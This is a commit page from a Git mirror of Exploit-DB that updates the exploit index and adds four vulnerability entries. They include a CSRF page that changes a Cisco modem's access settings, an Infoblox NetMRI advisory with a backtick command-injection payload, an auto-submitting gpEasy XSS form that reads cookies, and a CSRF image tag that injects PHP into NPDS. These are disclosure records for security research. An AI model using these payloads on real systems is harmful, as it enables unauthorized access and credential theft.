bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_12_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-12 04:39:14 +00:00
parent 96dfb9b9da
commit 7d14cd14d8
6 changed files with 107 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -19488,7 +19488,7 @@ id,file,description,date,author,platform,type,port
22259,platforms/linux/dos/22259.c,"BitchX 1.0 Malformed RPL_NAMREPLY Denial of Service Vulnerability",2003-01-30,argv,linux,dos,0
22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (1)",2003-02-19,bob,cgi,webapps,0
22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (2)",2003-02-19,CaMaLeoN,cgi,webapps,0
22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (3)",2003-02-19,SPAX,cgi,webapps,0
22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution Vulnerability (3)",2003-02-19,SPAX,cgi,webapps,0
22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (4)",2003-02-19,pokleyzz,cgi,webapps,0
22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x CBC Error Information Leakage Weakness",2003-02-19,"Martin Vuagnoux",linux,remote,0
22265,platforms/linux/local/22265.pl,"cPanel 5.0 Openwebmail Local Privileges Escalation Vulnerability",2003-02-19,deadbeat,linux,local,0
@ -28623,7 +28623,7 @@ id,file,description,date,author,platform,type,port
31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0
31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0, 12.0, 12.1 - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0
31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0
31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0
@ -30647,3 +30647,7 @@ id,file,description,date,author,platform,type,port
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0
34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0

Can't render this file because it is too large.

2
platforms/cgi/webapps/22262.pl
View file

@ -6,6 +6,8 @@ An attacker may exploit this vulnerability to execute commands in the security c
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.
#####################################################
# cpanel-plus.pl exploit
# Spawn bash style Shell on Apache CPANEL

9
platforms/hardware/remote/34033.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40346/info
Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.
Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.
Firmware versions prior to 2.0.2.r1256-100324as are vulnerable.
<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html>

64
platforms/lin_x86/webapps/34030.txt Executable file
View file

@ -0,0 +1,64 @@
Product: Network Automation, licensed as:
• NetMRI
• Switch Port Manager
• Automation Change Manager
• Security Device Controller
Vendor: Infoblox
Vulnerable Version(s): 6.4.X.X-6.8.4.X
Tested Version: 6.8.2.11
Vendor Notification: May 12th, 2014
Vendor Patch Availability to Customers: May 16th, 2014
Public Disclosure: July 9th, 2014
Vulnerability Type: OS Command Injection [CWE-78]
CVE Reference: CVE-2014-3418
Risk Level: High
CVSSv2 Base Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Solution Available
Discovered and Provided: Nate Kettlewell, Depth Security ( https://www.depthsecurity.com/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
Depth Security discovered a vulnerability in the Infoblox Network Automation management web interface. This attack does not require authentication of any kind.
1) OS Command Injection in Infoblox Network Automation Products: CVE-2014-3418
The vulnerability exists due to insufficient sanitization of user-supplied data in in skipjackUsername POST parameter. A remote attacker can inject operating system commands as the root user, and completely compromise the operating system.
The following is the relevant portion of the multipart/form-data POST request to netmri/config/userAdmin/login.tdf
Content-Disposition: form-data; name="skipjackUsername"
admin`ping -n 20 127.0.0.1`
------------------------------------------------------------------------
-----------------------
Solution:
Infoblox immediately released a hotfix to remediate this vulnerability on existing installations (v6.X-NETMRI-20710.gpg).
The flaw was corrected in the 6.8.5 release (created expressly for dealing with this issue), and that release has been put into manufacturing for new appliances.
------------------------------------------------------------------------
-----------------------
Proof of Concept:
In addition to manual exploitation via the above mentioned vector, proof of concept is provided in the form of a module for the metasploit framework.
https://github.com/depthsecurity/NetMRI-2014-3418
------------------------------------------------------------------------
-----------------------
References:
[1] Depth Security Advisory - http://blog.depthsecurity.com/2014/07/os-command-injection-in-infoblox-netmri.html - OS Command Injection in NetMRI.
[2] NetMRI - http://www.infoblox.com/products/network-automation/netmri - NetMRI is an Enterprise Network Management Appliance.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org/ - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] NetMRI Metasploit Module - https://github.com/depthsecurity/NetMRI-2014-3418

15
platforms/php/webapps/34031.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40330/info
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to gpEasy CMS 1.6.3 are vulnerable
<form method="POST" action="http://example.com/index.php/Home" name="myfrm">
<input type="hidden" name="cmd" value=&#039;save&#039;>
<input type="hidden" name="gpcontent" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.myfrm.submit();
</script>

11
platforms/php/webapps/34032.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40331/info
NPDS Revolution is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to compromise the affected application, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
NPDS Revolution 10.02 is vulnerable; prior versions may also be affected.
The following example request is available:
<img src="http://www.example.com/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1">